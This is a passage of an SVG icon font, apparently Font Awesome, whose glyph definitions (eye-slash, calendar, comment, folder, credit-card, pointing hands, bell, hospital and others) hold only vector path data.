c6.93066 -3.94141 19.0273 -7.18457 27 -7.24023c30.9121 0 56 25.0879 56 56c-0.0556641 7.97266 -3.29883 20.0693 -7.24023 27c8.42383 2.62207 22.4189 4.8623 31.2402 5zM572.52 206.6c1.9209 -3.79883 3.47949 -10.3379 3.47949 -14.5947
s-1.55859 -10.7959 -3.47949 -14.5947c-54.1992 -105.771 -161.59 -177.41 -284.52 -177.41s-230.29 71.5898 -284.52 177.4c-1.9209 3.79883 -3.47949 10.3379 -3.47949 14.5947s1.55859 10.7959 3.47949 14.5947c54.1992 105.771 161.59 177.41 284.52 177.41
s230.29 -71.5898 284.52 -177.4zM288 48c98.6602 0 189.1 55 237.93 144c-48.8398 89 -139.27 144 -237.93 144s-189.09 -55 -237.93 -144c48.8398 -89 139.279 -144 237.93 -144z" />
    <glyph glyph-name="eye-slash" unicode="&#xf070;" horiz-adv-x="640" 
d="M634 -23c3.31738 -2.65137 6.00977 -8.25098 6.00977 -12.498c0 -3.10449 -1.57715 -7.58984 -3.51953 -10.0117l-10 -12.4902c-2.65234 -3.31152 -8.24707 -6 -12.4902 -6c-3.09961 0 -7.58008 1.57227 -10 3.50977l-598 467.49
c-3.31738 2.65137 -6.00977 8.25098 -6.00977 12.498c0 3.10449 1.57715 7.58984 3.51953 10.0117l10 12.4902c2.65234 3.31152 8.24707 6 12.4902 6c3.09961 0 7.58008 -1.57227 10 -3.50977zM296.79 301.53c6.33496 1.35059 16.7324 2.45801 23.21 2.46973
c60.4805 0 109.36 -47.9102 111.58 -107.85zM343.21 82.46c-6.33496 -1.34375 -16.7334 -2.44629 -23.21 -2.45996c-60.4697 0 -109.35 47.9102 -111.58 107.84zM320 336c-19.8799 0 -39.2803 -2.7998 -58.2197 -7.09961l-46.4102 36.29
c32.9199 11.8096 67.9297 18.8096 104.63 18.8096c122.93 0 230.29 -71.5898 284.57 -177.4c1.91992 -3.79883 3.47949 -10.3379 3.47949 -14.5947s-1.55957 -10.7959 -3.47949 -14.5947c-11.7197 -22.7598 -35.4189 -56.4092 -52.9004 -75.1104l-37.7402 29.5
c14.333 15.0156 34.0449 41.9854 44 60.2002c-48.8398 89 -139.279 144 -237.93 144zM320 48c19.8896 0 39.2803 2.7998 58.2197 7.08984l46.4102 -36.2803c-32.9199 -11.7598 -67.9297 -18.8096 -104.63 -18.8096c-122.92 0 -230.28 71.5898 -284.51 177.4
c-1.9209 3.79883 -3.47949 10.3379 -3.47949 14.5947s1.55859 10.7959 3.47949 14.5947c11.7168 22.7568 35.4111 56.4014 52.8896 75.1006l37.7402 -29.5c-14.3467 -15.0107 -34.0811 -41.9756 -44.0498 -60.1904c48.8496 -89 139.279 -144 237.93 -144z" />
    <glyph glyph-name="calendar-alt" unicode="&#xf073;" horiz-adv-x="448" 
d="M148 160h-40c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12zM256 172c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h40
c6.59961 0 12 -5.40039 12 -12v-40zM352 172c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-40zM256 76c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12v40
c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-40zM160 76c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-40zM352 76c0 -6.59961 -5.40039 -12 -12 -12h-40
c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-40zM448 336v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h48v52c0 6.59961 5.40039 12 12 12h40
c6.59961 0 12 -5.40039 12 -12v-52h128v52c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-52h48c26.5 0 48 -21.5 48 -48zM400 -10v298h-352v-298c0 -3.2998 2.7002 -6 6 -6h340c3.2998 0 6 2.7002 6 6z" />
    <glyph glyph-name="comment" unicode="&#xf075;" 
d="M256 416c141.4 0 256 -93.0996 256 -208s-114.6 -208 -256 -208c-32.7998 0 -64 5.2002 -92.9004 14.2998c-29.0996 -20.5996 -77.5996 -46.2998 -139.1 -46.2998c-9.59961 0 -18.2998 5.7002 -22.0996 14.5c-3.80078 8.7998 -2 19 4.59961 26
c0.5 0.400391 31.5 33.7998 46.4004 73.2002c-33 35.0996 -52.9004 78.7002 -52.9004 126.3c0 114.9 114.6 208 256 208zM256 48c114.7 0 208 71.7998 208 160s-93.2998 160 -208 160s-208 -71.7998 -208 -160c0 -42.2002 21.7002 -74.0996 39.7998 -93.4004
l20.6006 -21.7998l-10.6006 -28.0996c-5.5 -14.5 -12.5996 -28.1006 -19.8994 -40.2002c23.5996 7.59961 43.1992 18.9004 57.5 29l19.5 13.7998l22.6992 -7.2002c25.3008 -8 51.7002 -12.0996 78.4004 -12.0996z" />
    <glyph glyph-name="folder" unicode="&#xf07b;" 
d="M464 320c26.5098 0 48 -21.4902 48 -48v-224c0 -26.5098 -21.4902 -48 -48 -48h-416c-26.5098 0 -48 21.4902 -48 48v288c0 26.5098 21.4902 48 48 48h146.74c8.49023 0 16.6299 -3.37012 22.6299 -9.37012l54.6299 -54.6299h192zM464 48v224h-198.62
c-8.49023 0 -16.6299 3.37012 -22.6299 9.37012l-54.6299 54.6299h-140.12v-288h416z" />
    <glyph glyph-name="folder-open" unicode="&#xf07c;" horiz-adv-x="575" 
d="M527.9 224c37.6992 0 60.6992 -41.5 40.6992 -73.4004l-79.8994 -128c-8.7998 -14.0996 -24.2002 -22.5996 -40.7002 -22.5996h-400c-26.5 0 -48 21.5 -48 48v288c0 26.5 21.5 48 48 48h160l64 -64h160c26.5 0 48 -21.5 48 -48v-48h47.9004zM48 330v-233.4l62.9004 104.2
c8.69922 14.4004 24.2998 23.2002 41.0996 23.2002h280v42c0 3.2998 -2.7002 6 -6 6h-173.9l-64 64h-134.1c-3.2998 0 -6 -2.7002 -6 -6zM448 48l80 128h-378.8l-77.2002 -128h376z" />
    <glyph glyph-name="chart-bar" unicode="&#xf080;" 
d="M396.8 96c-6.39941 0 -12.7998 6.40039 -12.7998 12.7998v230.4c0 6.39941 6.40039 12.7998 12.7998 12.7998h22.4004c6.39941 0 12.7998 -6.40039 12.7998 -12.7998v-230.4c0 -6.39941 -6.40039 -12.7998 -12.7998 -12.7998h-22.4004zM204.8 96
c-6.39941 0 -12.7998 6.40039 -12.7998 12.7998v198.4c0 6.39941 6.40039 12.7998 12.7998 12.7998h22.4004c6.39941 0 12.7998 -6.40039 12.7998 -12.7998v-198.4c0 -6.39941 -6.40039 -12.7998 -12.7998 -12.7998h-22.4004zM300.8 96
c-6.39941 0 -12.7998 6.40039 -12.7998 12.7998v134.4c0 6.39941 6.40039 12.7998 12.7998 12.7998h22.4004c6.39941 0 12.7998 -6.40039 12.7998 -12.7998v-134.4c0 -6.39941 -6.40039 -12.7998 -12.7998 -12.7998h-22.4004zM496 48c8.83984 0 16 -7.16016 16 -16v-16
c0 -8.83984 -7.16016 -16 -16 -16h-464c-17.6699 0 -32 14.3301 -32 32v336c0 8.83984 7.16016 16 16 16h16c8.83984 0 16 -7.16016 16 -16v-320h448zM108.8 96c-6.39941 0 -12.7998 6.40039 -12.7998 12.7998v70.4004c0 6.39941 6.40039 12.7998 12.7998 12.7998h22.4004
c6.39941 0 12.7998 -6.40039 12.7998 -12.7998v-70.4004c0 -6.39941 -6.40039 -12.7998 -12.7998 -12.7998h-22.4004z" />
    <glyph glyph-name="comments" unicode="&#xf086;" horiz-adv-x="576" 
d="M532 61.7998c15.2998 -30.7002 37.4004 -54.5 37.7998 -54.7998c6.2998 -6.7002 8 -16.5 4.40039 -25c-3.7002 -8.5 -12 -14 -21.2002 -14c-53.5996 0 -96.7002 20.2998 -125.2 38.7998c-19 -4.39941 -39 -6.7998 -59.7998 -6.7998
c-86.2002 0 -159.9 40.4004 -191.3 97.7998c-9.7002 1.2002 -19.2002 2.7998 -28.4004 4.90039c-28.5 -18.6006 -71.7002 -38.7998 -125.2 -38.7998c-9.19922 0 -17.5996 5.5 -21.1992 14c-3.7002 8.5 -1.90039 18.2998 4.39941 25
c0.400391 0.399414 22.4004 24.1992 37.7002 54.8994c-27.5 27.2002 -44 61.2002 -44 98.2002c0 88.4004 93.0996 160 208 160c86.2998 0 160.3 -40.5 191.8 -98.0996c99.7002 -11.8008 176.2 -77.9004 176.2 -157.9c0 -37.0996 -16.5 -71.0996 -44 -98.2002zM139.2 154.1
l19.7998 -4.5c16 -3.69922 32.5 -5.59961 49 -5.59961c86.7002 0 160 51.2998 160 112s-73.2998 112 -160 112s-160 -51.2998 -160 -112c0 -28.7002 16.2002 -50.5996 29.7002 -64l24.7998 -24.5l-15.5 -31.0996c-2.59961 -5.10059 -5.2998 -10.1006 -8 -14.8008
c14.5996 5.10059 29 12.3008 43.0996 21.4004zM498.3 96c13.5 13.4004 29.7002 35.2998 29.7002 64c0 49.2002 -48.2998 91.5 -112.7 106c0.299805 -3.2998 0.700195 -6.59961 0.700195 -10c0 -80.9004 -78 -147.5 -179.3 -158.3
c29.0996 -29.6006 77.2998 -49.7002 131.3 -49.7002c16.5 0 33 1.90039 49 5.59961l19.9004 4.60059l17.0996 -11.1006c14.0996 -9.09961 28.5 -16.2998 43.0996 -21.3994c-2.69922 4.7002 -5.39941 9.7002 -8 14.7998l-15.5 31.0996z" />
    <glyph glyph-name="star-half" unicode="&#xf089;" horiz-adv-x="308" 
d="M288 62.7002v-54.2998l-130.7 -68.6006c-23.3994 -12.2998 -50.8994 7.60059 -46.3994 33.7002l25 145.5l-105.7 103c-19 18.5 -8.5 50.7998 17.7002 54.5996l146.1 21.2002l65.2998 132.4c5.90039 11.8994 17.2998 17.7998 28.7002 17.7998v-68.0996l-62.2002 -126
l-139 -20.2002l100.601 -98l-23.7002 -138.4z" />
    <glyph glyph-name="lemon" unicode="&#xf094;" 
d="M484.112 420.111c28.1221 -28.123 35.9434 -68.0039 19.0215 -97.0547c-23.0576 -39.584 50.1436 -163.384 -82.3311 -295.86c-132.301 -132.298 -256.435 -59.3594 -295.857 -82.3291c-29.0459 -16.917 -68.9219 -9.11426 -97.0576 19.0205
c-28.1221 28.1221 -35.9434 68.0029 -19.0215 97.0547c23.0566 39.5859 -50.1436 163.386 82.3301 295.86c132.308 132.309 256.407 59.3496 295.862 82.332c29.0498 16.9219 68.9307 9.09863 97.0537 -19.0234zM461.707 347.217
c13.5166 23.2031 -27.7578 63.7314 -50.4883 50.4912c-66.6025 -38.7939 -165.646 45.5898 -286.081 -74.8457c-120.444 -120.445 -36.0449 -219.472 -74.8447 -286.08c-13.542 -23.2471 27.8145 -63.6953 50.4932 -50.4883
c66.6006 38.7949 165.636 -45.5996 286.076 74.8428c120.444 120.445 36.0449 219.472 74.8447 286.08zM291.846 338.481c1.37012 -10.96 -6.40332 -20.957 -17.3643 -22.3271c-54.8467 -6.85547 -135.779 -87.7871 -142.636 -142.636
c-1.37305 -10.9883 -11.3984 -18.7334 -22.3262 -17.3643c-10.9609 1.37012 -18.7344 11.3652 -17.3643 22.3262c9.16211 73.2852 104.167 168.215 177.364 177.364c10.9531 1.36816 20.9561 -6.40234 22.3262 -17.3633z" />
    <glyph glyph-name="credit-card" unicode="&#xf09d;" horiz-adv-x="576" 
d="M527.9 416c26.5996 0 48.0996 -21.5 48.0996 -48v-352c0 -26.5 -21.5 -48 -48.0996 -48h-479.801c-26.5996 0 -48.0996 21.5 -48.0996 48v352c0 26.5 21.5 48 48.0996 48h479.801zM54.0996 368c-3.2998 0 -6 -2.7002 -6 -6v-42h479.801v42c0 3.2998 -2.7002 6 -6 6
h-467.801zM521.9 16c3.2998 0 6 2.7002 6 6v170h-479.801v-170c0 -3.2998 2.7002 -6 6 -6h467.801zM192 116v-40c0 -6.59961 -5.40039 -12 -12 -12h-72c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h72c6.59961 0 12 -5.40039 12 -12zM384 116v-40
c0 -6.59961 -5.40039 -12 -12 -12h-136c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h136c6.59961 0 12 -5.40039 12 -12z" />
    <glyph glyph-name="hdd" unicode="&#xf0a0;" horiz-adv-x="576" 
d="M567.403 212.358c5.59668 -8.04688 8.59668 -17.6113 8.59668 -27.4121v-136.946c0 -26.5098 -21.4902 -48 -48 -48h-480c-26.5098 0 -48 21.4902 -48 48v136.946c0 8.30957 3.85156 20.5898 8.59668 27.4121l105.08 151.053
c7.90625 11.3652 25.5596 20.5889 39.4033 20.5889h0.000976562h269.838h0.000976562c13.8438 0 31.4971 -9.22363 39.4033 -20.5889zM153.081 336l-77.9131 -112h425.664l-77.9131 112h-269.838zM528 48v128h-480v-128h480zM496 112c0 -17.6729 -14.3271 -32 -32 -32
s-32 14.3271 -32 32s14.3271 32 32 32s32 -14.3271 32 -32zM400 112c0 -17.6729 -14.3271 -32 -32 -32s-32 14.3271 -32 32s14.3271 32 32 32s32 -14.3271 32 -32z" />
    <glyph glyph-name="hand-point-right" unicode="&#xf0a4;" 
d="M428.8 310.4c45.0996 0 83.2002 -38.1016 83.2002 -83.2002c0 -45.6162 -37.7646 -83.2002 -83.2002 -83.2002h-35.6475c-1.41602 -6.36719 -4.96875 -16.252 -7.92969 -22.0645c2.50586 -22.0059 -3.50293 -44.9775 -15.9844 -62.791
c-1.14062 -52.4863 -37.3984 -91.1445 -99.9404 -91.1445h-21.2988c-60.0635 0 -98.5117 40 -127.2 40h-2.67871c-5.74707 -4.95215 -13.5361 -8 -22.1201 -8h-64c-17.6729 0 -32 12.8936 -32 28.7998v230.4c0 15.9062 14.3271 28.7998 32 28.7998h64.001
c8.58398 0 16.373 -3.04785 22.1201 -8h2.67871c6.96387 0 14.8623 6.19336 30.1816 23.6689l0.128906 0.148438l0.130859 0.145508c8.85645 9.93652 18.1162 20.8398 25.8506 33.2529c18.7051 30.2471 30.3936 78.7842 75.707 78.7842c56.9277 0 92 -35.2861 92 -83.2002
v-0.0839844c0 -6.21777 -0.974609 -16.2148 -2.17578 -22.3154h86.1768zM428.8 192c18.9756 0 35.2002 16.2246 35.2002 35.2002c0 18.7002 -16.7754 35.2002 -35.2002 35.2002h-158.399c0 17.3242 26.3994 35.1992 26.3994 70.3994c0 26.4004 -20.625 35.2002 -44 35.2002
c-8.79395 0 -20.4443 -32.7119 -34.9258 -56.0996c-9.07422 -14.5752 -19.5244 -27.2256 -30.7988 -39.875c-16.1094 -18.374 -33.8359 -36.6328 -59.0752 -39.5967v-176.753c42.79 -3.7627 74.5088 -39.6758 120 -39.6758h21.2988
c40.5244 0 57.124 22.1973 50.6006 61.3252c14.6113 8.00098 24.1514 33.9785 12.9248 53.625c19.3652 18.2246 17.7871 46.3809 4.9502 61.0498h91.0254zM88 64c0 13.2549 -10.7451 24 -24 24s-24 -10.7451 -24 -24s10.7451 -24 24 -24s24 10.7451 24 24z" />
    <glyph glyph-name="hand-point-left" unicode="&#xf0a5;" horiz-adv-x="511" 
d="M0 227.2c0 45.0986 38.1006 83.2002 83.2002 83.2002h86.1758c-1.3623 6.91016 -2.17578 14.374 -2.17578 22.3994c0 47.9141 35.0723 83.2002 92 83.2002c45.3135 0 57.002 -48.5371 75.7061 -78.7852c7.73438 -12.4121 16.9951 -23.3154 25.8506 -33.2529
l0.130859 -0.145508l0.128906 -0.148438c15.3213 -17.4746 23.2197 -23.668 30.1836 -23.668h2.67871c5.74707 4.95215 13.5361 8 22.1201 8h64c17.6729 0 32 -12.8936 32 -28.7998v-230.4c0 -15.9062 -14.3271 -28.7998 -32 -28.7998h-64
c-8.58398 0 -16.373 3.04785 -22.1201 8h-2.67871c-28.6885 0 -67.1367 -40 -127.2 -40h-21.2988c-62.542 0 -98.8008 38.6582 -99.9404 91.1445c-12.4814 17.8135 -18.4922 40.7852 -15.9844 62.791c-2.96094 5.8125 -6.51367 15.6973 -7.92969 22.0645h-35.6465
c-45.4355 0 -83.2002 37.584 -83.2002 83.2002zM48 227.2c0 -18.9756 16.2246 -35.2002 35.2002 -35.2002h91.0244c-12.8369 -14.6689 -14.415 -42.8252 4.9502 -61.0498c-11.2256 -19.6465 -1.68652 -45.624 12.9248 -53.625
c-6.52246 -39.1279 10.0771 -61.3252 50.6016 -61.3252h21.2988c45.4912 0 77.21 35.9131 120 39.6768v176.752c-25.2393 2.96289 -42.9658 21.2227 -59.0752 39.5967c-11.2744 12.6494 -21.7246 25.2998 -30.7988 39.875
c-14.4814 23.3877 -26.1318 56.0996 -34.9258 56.0996c-23.375 0 -44 -8.7998 -44 -35.2002c0 -35.2002 26.3994 -53.0752 26.3994 -70.3994h-158.399c-18.4248 0 -35.2002 -16.5 -35.2002 -35.2002zM448 88c-13.2549 0 -24 -10.7451 -24 -24s10.7451 -24 24 -24
s24 10.7451 24 24s-10.7451 24 -24 24z" />
    <glyph glyph-name="hand-point-up" unicode="&#xf0a6;" horiz-adv-x="448" 
d="M105.6 364.8c0 45.0996 38.1016 83.2002 83.2002 83.2002c45.6162 0 83.2002 -37.7646 83.2002 -83.2002v-35.6465c6.36719 -1.41602 16.252 -4.96875 22.0645 -7.92969c22.0059 2.50684 44.9775 -3.50293 62.791 -15.9844
c52.4863 -1.14062 91.1445 -37.3984 91.1445 -99.9404v-21.2988c0 -60.0635 -40 -98.5117 -40 -127.2v-2.67871c4.95215 -5.74707 8 -13.5361 8 -22.1201v-64c0 -17.6729 -12.8936 -32 -28.7998 -32h-230.4c-15.9062 0 -28.7998 14.3271 -28.7998 32v64
c0 8.58398 3.04785 16.373 8 22.1201v2.67871c0 6.96387 -6.19336 14.8623 -23.6689 30.1816l-0.148438 0.128906l-0.145508 0.130859c-9.93652 8.85645 -20.8398 18.1162 -33.2529 25.8506c-30.2471 18.7051 -78.7842 30.3936 -78.7842 75.707
c0 56.9277 35.2861 92 83.2002 92h0.0839844c6.21777 0 16.2148 -0.974609 22.3154 -2.17578v86.1768zM224 364.8c0 18.9756 -16.2246 35.2002 -35.2002 35.2002c-18.7002 0 -35.2002 -16.7754 -35.2002 -35.2002v-158.399c-17.3242 0 -35.1992 26.3994 -70.3994 26.3994
c-26.4004 0 -35.2002 -20.625 -35.2002 -44c0 -8.79395 32.7119 -20.4443 56.0996 -34.9258c14.5752 -9.07422 27.2256 -19.5244 39.875 -30.7988c18.374 -16.1094 36.6328 -33.8359 39.5967 -59.0752h176.753c3.7627 42.79 39.6758 74.5088 39.6758 120v21.2988
c0 40.5244 -22.1973 57.124 -61.3252 50.6006c-8.00098 14.6113 -33.9785 24.1514 -53.625 12.9248c-18.2246 19.3652 -46.3809 17.7871 -61.0498 4.9502v91.0254zM352 24c-13.2549 0 -24 -10.7451 -24 -24s10.7451 -24 24 -24s24 10.7451 24 24s-10.7451 24 -24 24z" />
    <glyph glyph-name="hand-point-down" unicode="&#xf0a7;" horiz-adv-x="448" 
d="M188.8 -64c-45.0986 0 -83.2002 38.1006 -83.2002 83.2002v86.1758c-6.91016 -1.3623 -14.374 -2.17578 -22.3994 -2.17578c-47.9141 0 -83.2002 35.0723 -83.2002 92c0 45.3135 48.5371 57.002 78.7852 75.707c12.4121 7.73438 23.3154 16.9951 33.2529 25.8506
l0.145508 0.130859l0.148438 0.128906c17.4746 15.3213 23.668 23.2197 23.668 30.1836v2.67871c-4.95215 5.74707 -8 13.5361 -8 22.1201v64c0 17.6729 12.8936 32 28.7998 32h230.4c15.9062 0 28.7998 -14.3271 28.7998 -32v-64.001
c0 -8.58398 -3.04785 -16.373 -8 -22.1201v-2.67871c0 -28.6885 40 -67.1367 40 -127.2v-21.2988c0 -62.542 -38.6582 -98.8008 -91.1445 -99.9404c-17.8135 -12.4814 -40.7852 -18.4922 -62.791 -15.9844c-5.8125 -2.96094 -15.6973 -6.51367 -22.0645 -7.92969v-35.6465
c0 -45.4355 -37.584 -83.2002 -83.2002 -83.2002zM188.8 -16c18.9756 0 35.2002 16.2246 35.2002 35.2002v91.0244c14.6689 -12.8369 42.8252 -14.415 61.0498 4.9502c19.6465 -11.2256 45.624 -1.68652 53.625 12.9248c39.1279 -6.52246 61.3252 10.0771 61.3252 50.6016
v21.2988c0 45.4912 -35.9131 77.21 -39.6768 120h-176.752c-2.96289 -25.2393 -21.2227 -42.9658 -39.5967 -59.0752c-12.6494 -11.2744 -25.2998 -21.7246 -39.875 -30.7988c-23.3877 -14.4814 -56.0996 -26.1318 -56.0996 -34.9258c0 -23.375 8.7998 -44 35.2002 -44
c35.2002 0 53.0752 26.3994 70.3994 26.3994v-158.399c0 -18.4248 16.5 -35.2002 35.2002 -35.2002zM328 384c0 -13.2549 10.7451 -24 24 -24s24 10.7451 24 24s-10.7451 24 -24 24s-24 -10.7451 -24 -24z" />
    <glyph glyph-name="copy" unicode="&#xf0c5;" horiz-adv-x="448" 
d="M433.941 382.059c7.75977 -7.75977 14.0586 -22.9658 14.0586 -33.9404v-268.118c0 -26.5098 -21.4902 -48 -48 -48h-80v-48c0 -26.5098 -21.4902 -48 -48 -48h-224c-26.5098 0 -48 21.4902 -48 48v320c0 26.5098 21.4902 48 48 48h80v48c0 26.5098 21.4902 48 48 48
h172.118c10.9746 0 26.1807 -6.29883 33.9404 -14.0586zM266 -16c3.31152 0 6 2.68848 6 6v42h-96c-26.5098 0 -48 21.4902 -48 48v224h-74c-3.31152 0 -6 -2.68848 -6 -6v-308c0 -3.31152 2.68848 -6 6 -6h212zM394 80c3.31152 0 6 2.68848 6 6v202h-88
c-13.2549 0 -24 10.7451 -24 24v88h-106c-3.31152 0 -6 -2.68848 -6 -6v-308c0 -3.31152 2.68848 -6 6 -6h212zM400 336v9.63184v0.000976562c0 1.37207 -0.787109 3.27246 -1.75684 4.24219l-48.3682 48.3682c-1.12598 1.125 -2.65234 1.75684 -4.24316 1.75684h-9.63184
v-64h64z" />
    <glyph glyph-name="save" unicode="&#xf0c7;" horiz-adv-x="448" 
d="M433.941 318.059c7.75977 -7.75977 14.0586 -22.9658 14.0586 -33.9404v-268.118c0 -26.5098 -21.4902 -48 -48 -48h-352c-26.5098 0 -48 21.4902 -48 48v352c0 26.5098 21.4902 48 48 48h268.118c10.9746 0 26.1807 -6.29883 33.9404 -14.0586zM272 368h-128v-80h128v80
zM394 16c3.31152 0 6 2.68848 6 6v259.632v0.000976562c0 1.37207 -0.787109 3.27246 -1.75684 4.24219l-78.2432 78.2432v-100.118c0 -13.2549 -10.7451 -24 -24 -24h-176c-13.2549 0 -24 10.7451 -24 24v104h-42c-3.31152 0 -6 -2.68848 -6 -6v-340
c0 -3.31152 2.68848 -6 6 -6h340zM224 216c48.5234 0 88 -39.4766 88 -88s-39.4766 -88 -88 -88s-88 39.4766 -88 88s39.4766 88 88 88zM224 88c22.0557 0 40 17.9443 40 40s-17.9443 40 -40 40s-40 -17.9443 -40 -40s17.9443 -40 40 -40z" />
    <glyph glyph-name="square" unicode="&#xf0c8;" horiz-adv-x="448" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352zM394 16c3.2998 0 6 2.7002 6 6v340c0 3.2998 -2.7002 6 -6 6h-340c-3.2998 0 -6 -2.7002 -6 -6v-340c0 -3.2998 2.7002 -6 6 -6h340z" />
    <glyph glyph-name="envelope" unicode="&#xf0e0;" 
d="M464 384c26.5098 0 48 -21.4902 48 -48v-288c0 -26.5098 -21.4902 -48 -48 -48h-416c-26.5098 0 -48 21.4902 -48 48v288c0 26.5098 21.4902 48 48 48h416zM464 336h-416v-40.8047c22.4248 -18.2627 58.1797 -46.6602 134.587 -106.49
c16.834 -13.2422 50.2051 -45.0762 73.4131 -44.7012c23.2119 -0.371094 56.5723 31.4541 73.4131 44.7012c76.4189 59.8389 112.165 88.2305 134.587 106.49v40.8047zM48 48h416v185.601c-22.915 -18.252 -55.4189 -43.8691 -104.947 -82.6523
c-22.5439 -17.748 -60.3359 -55.1787 -103.053 -54.9473c-42.9277 -0.231445 -81.2051 37.75 -103.062 54.9551c-49.5293 38.7842 -82.0244 64.3945 -104.938 82.6455v-185.602z" />
    <glyph glyph-name="lightbulb" unicode="&#xf0eb;" horiz-adv-x="352" 
d="M176 368c8.83984 0 16 -7.16016 16 -16s-7.16016 -16 -16 -16c-35.2803 0 -64 -28.7002 -64 -64c0 -8.83984 -7.16016 -16 -16 -16s-16 7.16016 -16 16c0 52.9404 43.0596 96 96 96zM96.0596 -11.1699l-0.0400391 43.1797h159.961l-0.0507812 -43.1797
c-0.00976562 -3.13965 -0.939453 -6.21973 -2.67969 -8.83984l-24.5098 -36.8398c-2.95996 -4.45996 -7.95996 -7.14062 -13.3203 -7.14062h-78.8496c-5.35059 0 -10.3506 2.68066 -13.3203 7.14062l-24.5098 36.8398c-1.75 2.62012 -2.68066 5.68945 -2.68066 8.83984z
M176 448c97.2002 0 176 -78.7998 176 -176c0 -44.3701 -16.4502 -84.8496 -43.5498 -115.79c-16.6406 -18.9795 -42.7402 -58.79 -52.4199 -92.1602v-0.0498047h-48v0.0996094c0.00390625 4.04199 0.999023 10.4482 2.21973 14.3008
c5.67969 17.9893 22.9902 64.8496 62.0996 109.46c20.4102 23.29 31.6504 53.1699 31.6504 84.1396c0 70.5801 -57.4199 128 -128 128c-68.2803 0 -128.15 -54.3604 -127.95 -128c0.0898438 -30.9902 11.0703 -60.71 31.6104 -84.1396
c39.3496 -44.9004 56.5801 -91.8604 62.1699 -109.67c1.42969 -4.56055 2.13965 -9.30078 2.15039 -14.0703v-0.120117h-48v0.0595703c-9.68066 33.3604 -35.7803 73.1709 -52.4209 92.1602c-27.1094 30.9307 -43.5596 71.4102 -43.5596 115.78
c0 93.0303 73.7197 176 176 176z" />
    <glyph glyph-name="bell" unicode="&#xf0f3;" horiz-adv-x="448" 
d="M439.39 85.71c6 -6.44043 8.66016 -14.1602 8.61035 -21.71c-0.0996094 -16.4004 -12.9805 -32 -32.0996 -32h-383.801c-19.1191 0 -31.9893 15.5996 -32.0996 32c-0.0498047 7.5498 2.61035 15.2598 8.61035 21.71c19.3193 20.7598 55.4697 51.9902 55.4697 154.29
c0 77.7002 54.4795 139.9 127.939 155.16v20.8398c0 17.6699 14.3203 32 31.9805 32s31.9805 -14.3301 31.9805 -32v-20.8398c73.46 -15.2598 127.939 -77.46 127.939 -155.16c0 -102.3 36.1504 -133.53 55.4697 -154.29zM67.5303 80h312.939
c-21.2197 27.96 -44.4199 74.3203 -44.5293 159.42c0 0.200195 0.0595703 0.379883 0.0595703 0.580078c0 61.8604 -50.1396 112 -112 112s-112 -50.1396 -112 -112c0 -0.200195 0.0595703 -0.379883 0.0595703 -0.580078
c-0.109375 -85.0898 -23.3096 -131.45 -44.5293 -159.42zM224 -64c-35.3203 0 -63.9697 28.6504 -63.9697 64h127.939c0 -35.3496 -28.6494 -64 -63.9697 -64z" />
    <glyph glyph-name="hospital" unicode="&#xf0f8;" horiz-adv-x="448" 
d="M128 204v40c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-40c0 -6.62695 -5.37305 -12 -12 -12h-40c-6.62695 0 -12 5.37305 -12 12zM268 192c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-40
c0 -6.62695 -5.37305 -12 -12 -12h-40zM192 108c0 -6.62695 -5.37305 -12 -12 -12h-40c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-40zM268 96c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h40
c6.62695 0 12 -5.37305 12 -12v-40c0 -6.62695 -5.37305 -12 -12 -12h-40zM448 -28v-36h-448v36c0 6.62695 5.37305 12 12 12h19.5v378.965c0 11.6172 10.7451 21.0352 24 21.0352h88.5v40c0 13.2549 10.7451 24 24 24h112c13.2549 0 24 -10.7451 24 -24v-40h88.5
c13.2549 0 24 -9.41797 24 -21.0352v-378.965h19.5c6.62695 0 12 -5.37305 12 -12zM79.5 -15h112.5v67c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-67h112.5v351h-64.5v-24c0 -13.2549 -10.7451 -24 -24 -24h-112c-13.2549 0 -24 10.7451 -24 24v24
h-64.5v-351zM266 384h-26v26c0 3.31152 -2.68848 6 -6 6h-20c-3.31152 0 -6 -2.68848 -6 -6v-26h-26c-3.31152 0 -6 -2.68848 -6 -6v-20c0 -3.31152 2.68848 -6 6 -6h26v-26c0 -3.31152 2.68848 -6 6 -6h20c3.31152 0 6 2.68848 6 6v26h26c3.31152 0 6 2.68848 6 6v20
c0 3.31152 -2.68848 6 -6 6z" />
    <glyph glyph-name="plus-square" unicode="&#xf0fe;" horiz-adv-x="448" 
d="M352 208v-32c0 -6.59961 -5.40039 -12 -12 -12h-88v-88c0 -6.59961 -5.40039 -12 -12 -12h-32c-6.59961 0 -12 5.40039 -12 12v88h-88c-6.59961 0 -12 5.40039 -12 12v32c0 6.59961 5.40039 12 12 12h88v88c0 6.59961 5.40039 12 12 12h32c6.59961 0 12 -5.40039 12 -12
